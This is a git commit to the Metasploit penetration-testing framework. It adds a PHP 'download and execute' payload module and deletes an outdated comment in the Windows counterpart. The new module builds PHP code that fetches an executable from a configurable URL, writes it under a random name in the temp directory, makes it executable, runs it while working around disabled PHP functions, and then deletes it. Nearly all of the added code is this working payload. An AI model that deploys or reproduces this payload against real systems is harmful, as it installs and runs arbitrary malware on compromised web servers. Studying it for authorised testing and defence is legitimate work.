add php/download_exec and remove an erroneous comment from windows/download_exec

git-svn-id: file:///home/svn/framework3/trunk@6905 4d416f70-5f16-0410-b530-b9f4589650da
unstable
James Lee 2009-07-26 23:08:31 +00:00
parent 263998e27d
commit 9c9669f5d9
2 changed files with 88 additions and 6 deletions

View File

@ -0,0 +1,87 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/payload/windows/exec'
module Metasploit3
include Msf::Payload::Php
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP Executable Download and Execute',
'Version' => '$Revision: 6479 $',
'Description' => 'Download an EXE from a HTTP URL and execute it',
'Author' => [ 'egypt' ],
'License' => BSD_LICENSE,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Privileged' => false
))
# EXITFUNC is not supported :/
deregister_options('EXITFUNC')
# Register command execution options
register_options(
[
OptString.new('URL', [ true, "The pre-encoded URL to the executable" ])
], self.class)
end
def php_exec_file
exename = Rex::Text.rand_text_alpha(rand(8) + 4)
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
shell = <<-END_OF_PHP_CODE
if (!function_exists('sys_get_temp_dir')) {
function sys_get_temp_dir() {
if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
if (!empty($_ENV['TMPDIR'])) { return realpath($_ENV['TMPDIR']); }
if (!empty($_ENV['TEMP'])) { return realpath($_ENV['TEMP']); }
$tempfile=tempnam(uniqid(rand(),TRUE),'');
if (file_exists($tempfile)) {
@unlink($tempfile);
return realpath(dirname($tempfile));
}
return null;
}
}
$fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "#{exename}.exe";
$fd_in = fopen("#{datastore['URL']}", "rb");
$fd_out = fopen($fname, "wb");
while (!feof($fd_in)) {
fwrite($fd_out, fread($fd_in, 8192));
}
fclose($fd_in);
fclose($fd_out);
chmod($fname, 0777);
$c = $fname;
#{php_preamble({:disabled_varname => dis})}
#{php_system_block({:cmd_varname => "$c", :disabled_varname => dis})}
@unlink($fname);
END_OF_PHP_CODE
#return Rex::Text.compress(shell)
return shell
end
#
# Constructs the payload
#
def generate
return php_exec_file
end
end

View File

@ -14,11 +14,6 @@ require 'msf/core'
require 'msf/core/payload/windows/exec'
###
#
# Extends the Exec payload to add a new user.
#
###
module Metasploit3
include Msf::Payload::Windows
@ -80,4 +75,4 @@ module Metasploit3
return module_info['Payload']['Payload'] + (datastore['URL'] || '') + "\x80"
end
end
end